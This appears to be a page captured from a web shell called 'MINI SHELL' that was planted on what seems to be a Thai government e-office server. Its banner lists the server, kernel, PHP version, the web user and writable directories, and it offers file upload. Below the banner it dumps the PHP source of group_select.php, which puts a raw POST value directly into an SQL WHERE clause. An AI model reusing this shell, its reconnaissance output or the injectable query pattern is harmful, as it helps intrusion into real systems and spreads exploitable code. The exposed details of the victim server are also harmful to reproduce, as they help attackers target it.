MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/eoffice/application/document/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/eoffice/application/document/group_select.php
<?

//include("chk_permission.php");
session_start();
include("../../config/config.inc.php");
include("../../common/function.php");
include("../../common/eoffice.inc.php");


$org_id	= intval($_SESSION[session_dev_id]);
$sex 		= array("M"=>"ชาย","F"=>"หญิง");
$m1		= array("docreg_sendgroup.php", "user_ht.php"); 							//, "user_pf.php"
$m2		= array("กลุ่มองค์กร", "กลุ่มโปรเจค"); 		// , "ข้อมูลหน่วยงาน"




if ($_SERVER[REQUEST_METHOD] == "POST"){ 
// print_r($_POST);

if($mode=="sid"){
		$xtype=""; $a=0;
		if($_POST[checkbox]){
		$num=$_POST[checkbox];
			$xtype.=$num.",";
			$select_code.=" $table_staffgroup.gid =  $_POST[checkbox]";
	}else{
	?>
	<SCRIPT language="javascript">
	 window.close();
	</SCRIPT>
	<?
	}


	//AND $table_staffgroup.parent !=  '0'
	$sql_check_group="
	SELECT
	$table_staffgroup.groupname,
	$table_staffgroup.gid
	FROM
	$table_staffgroup 
	WHERE
	$table_staffgroup.org_id =  '2'
	AND
	$select_code
	ORDER by $table_staffgroup.gid ASC
	";

	$show_gid="";
	$resultg = mysql_query($sql_check_group)or die("Query line " . __LINE__ . " error<hr>".mysql_error());

	$rs_glist = mysql_fetch_assoc($resultg);

	$x="";
	if($rs_glist[title]){$x="(".$rs_glist[title].") ";};

	$show_gid.=$rs_glist[groupname]." ".$x.$rs_glist[prename].$rs_glist[staffname]." ".$rs_glist[staffsurname];
	$owner_id.=$rs_glist[owner_id];
	$xgid=$rs_glist[gid];

	?>
	<SCRIPT language="javascript">
	opener.document.post.xgid.value="<?=$xgid?>";
	opener.document.post.sid.value="<?=$owner_id?>";
	opener.document.post.sid_show.value="<?=trim($show_gid)?>";
	opener.document.post.sid_show.focus();
	 window.close();
	</SCRIPT>
	<?
	}
 // END POST
 }else{
$sql_history="
SELECT
document.`status`,
document.time_rec,
document.owner,
doc_receive.status,
doc_receive.staff_id,
doc_receive.group_id,
$table_staff.prename,
$table_staff.staffname,
$table_staff.staffsurname
FROM
doc_receive
Inner Join document ON doc_receive.docid = document.id
Inner Join $table_staff ON doc_receive.staff_id = $table_staff.staffid
Group by $table_staff.staffid
";
$result = mysql_query($sql_history)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
while($hrs1 = mysql_fetch_assoc($result)){
if($hrs1[group_id][0]=="g"){ $g=substr($hrs1[group_id],1); $gid_check[$g]="$g";}
if($hrs1[group_id][0]=="p"){ $p=substr($hrs1[group_id],1); $pid_check[$p]="$p";}
	}
 }
?>
<HTML xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<META http-equiv="Content-Type" content="text/html; charset=windows-874" />
<LINK href="../../common/style.css" rel="stylesheet" />
<TITLE>แก้ไขรายละเอียดต่าง ๆ</TITLE>
<STYLE>
.p_border{
border-bottom:2 solid #DADCED;
}
.shadetabs{
padding				: 3px 0px ;
margin-left			: 0;
margin-top			: 1px;
margin-bottom	: 0;
font					: bold 12px tahoma;
list-style-type		: none;
text-align			: left; /*set to left, center, or right to align the menu as desired*/
}

.shadetabs li{
display	: inline;
margin	: 0;
background-color:#F2F4F7;
}

.shadetabs li a{
text-decoration	: none;
padding				: 3px 7px;
margin-right		: 0px;
border				: 1px solid #cccccc;
color					: #666666;
text-decoration	:underline;
}

.shadetabs li a:visited{
color					: #666666;
}

.shadetabs li a:hover{
color					: #666666;
}

.shadetabs li.selected{
position			: relative;
top				: 1px;
}



.shadetabs li.selected a{ /*selected main tab style */
background-color		: #DADCED;
border-bottom-color	: #DADCED;
}

.shadetabs li.selected a:hover{ /*selected main tab style */
text-decoration			: none;
}

.contentstyle{
border						: 1px solid #cccccc;
width							: 700px;
margin-bottom			: 1em; 
padding						: 10px;
background-color		: #DADCED;
}

body {
	margin-left: 5px;
	margin-top: 5px;
	margin-right: 5px;
}
</STYLE>
<SCRIPT language="javascript" src="ajaxtabs.js"></SCRIPT>
<SCRIPT type="text/javascript" src="dtree/dtree.js"></SCRIPT>
<SCRIPT src="../../common/functions.js" type="text/javascript" language="javascript"></SCRIPT>
<LINK href="../../common/style_menu.css" rel=StyleSheet type="text/css">
<LINK href="../../common/style.css" rel="stylesheet" type="text/css">
<SCRIPT language="JavaScript" type="text/javascript" src="ajax_search.js"></SCRIPT>
<SCRIPT language="javascript">
function ChangePass() {

	if(document.post.old_pwd.value.length==0) {
		alert("กรุณากรอกรหัสผ่าน");
		document.post.old_pwd.focus();
		return false;
	} else if(document.post.new_pwd1.value.length==0) {
		alert("โปรดใส่รหัสผ่านใหม่");
		document.post.new_pwd1.focus();
		return false;
	} else if(document.post.new_pwd1.value.length != document.post.new_pwd2.value.length) {
		alert("รหัสผ่านทั้งสองไม่ตรงกัน กรุณายืนยันรหัสผ่านให้ถูกต้อง") ;
		document.post.new_pwd2.focus() ;
		return false ;	
	} 

	var rnd				= "rnd=" + Math.random();
	var pwd_old 		= "&pwd_old=" + document.post.old_pwd.value;
	var pwd_new	= "&pwd_new=" + document.post.new_pwd1.value;	
	var param			= rnd + pwd_old + pwd_new;
	var txt				= "&nbsp;&nbsp;<img src=\"../../images/indicator.gif\" align=\"absmiddle\" height=\"16\" width=\"16\">&nbsp;Updating...";	
	document.getElementById("Status").innerHTML= txt;

 	xmlHttp.open('POST', 'user_cpwd.php', true); 
    xmlHttp.onreadystatechange = function() { 
         if (xmlHttp.readyState==4) {
              if (xmlHttp.status==200) { document.getElementById("Status").innerHTML = xmlHttp.responseText }
         }
    };

    xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xmlHttp.send(param); 
	document.post.reset();
}

function UpdateProfile() {

	if(document.profile.staffname.value.length==0) {
		alert("โปรดระบุชื่อภาษาไทย");
		document.profile.staffname.focus();
		return false;
	} else if(document.profile.staffsurname.value.length==0) {
		alert("โปรดระบุนามสกุลภาษาไทย");
		document.profile.staffsurname.focus();
		return false;
	} else if(document.profile.engname.value.length==0) {
		alert("โปรดระบุชื่อภาษาอังกฤษ");
		document.profile.engname.focus();
		return false;
	} else if(document.profile.engsurname.value.length==0) {
		alert("โปรดระบุนามสกุลภาษาอังกฤษ");
		document.profile.engsurname.focus();
		return false;	
	} else if(document.profile.email.value.length != 0) {	
		
		if(profile.email.value.indexOf('@')==-1) {
	  		alert("อีเมล์ของคุณไม่ถูกต้องครับ") ;
	  		document.profile.email.focus() ;
	  		return false ;
  		} else if(profile.email.value.indexOf('.')==-1) {
	  		alert("อีเมล์ของคุณไม่ถูกต้องครับ") ;
	  		document.profile.email.focus() ;
	  		return false ;
	  	}			

	} 

	var rnd					= "rnd=" + Math.random();
	var prename			= "&prename=" + document.profile.prename.value;
	var staffname 		= "&staffname=" + document.profile.staffname.value;
	var staffsurname	= "&staffsurname=" + document.profile.staffsurname.value;		
	var engprename	= "&engprename=" + document.profile.engprename.value;		
	var engname			= "&engname=" + document.profile.engname.value;		
	var engsurname	= "&engsurname=" + document.profile.engsurname.value;		
	var email				= "&email=" + document.profile.email.value;	
	var sex					= "&sex=" + document.profile.sex.value;	
	var title					= "&title=" + document.profile.title.value;	
	var telno				= "&telno=" + document.profile.telno.value;	
	//var address			= "&address=" + document.profile.address.value;		
	var comment			= "&comment=" + document.profile.comment.value;		
	var refid_info				= "&refid_info=" + document.profile.refid_info.value;	
	var param		= rnd + prename + staffname + staffsurname + engprename + engname + engsurname + email + sex + title + telno + comment+refid_info ;
	var txt			= "&nbsp;&nbsp;<img src=\"../../images/indicator.gif\" align=\"absmiddle\" height=\"16\" width=\"16\">&nbsp;Updating...";
	document.getElementById("Status").innerHTML= txt;
 	xmlHttp.open('POST', 'user_profile.php', true); 
    xmlHttp.onreadystatechange = function() { 
         if (xmlHttp.readyState==4) {
              if (xmlHttp.status==200) { document.getElementById("Status").innerHTML = xmlHttp.responseText }
         }
    };

    xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xmlHttp.send(param); 	

}	

	

function uplImage()	{

	var url 			= "user_image.php?rnd=" + Math.random() ;
	var newwin 	= window.open(url ,'popup','location=0,status=no,scrollbars=no,resizable=no,width=400,height=120,top=200');
	newwin.focus();

}

</SCRIPT>
</HEAD>
<BODY>
<TABLE width="100%" border="0" cellspacing="0" cellpadding="0" >
<TR valign="top">
    <TD>
<UL id="maintab" class="shadetabs">
&nbsp;
<?
for($i=0;$i<count($m1);$i++){

	$showtab = ($i<=0) ? " class=\"selected\" " : "" ;	
	echo "<li $showtab><a href=\"".$m1[$i]."\" rel=\"ajaxcontentarea\">".$m2[$i]."</a></li>";

}
?>
</UL>
<DIV id="ajaxcontentarea" class="contentstyle" align="left" style="width:100%">
<!--###################################################################################-->




<!--###################################################################################-->
</DIV>	
	</TD>
</TR>
</TABLE>
<SCRIPT type="text/javascript">startajaxtabs("maintab")</SCRIPT>
</BODY>
</HTML>

Anon7 - 2021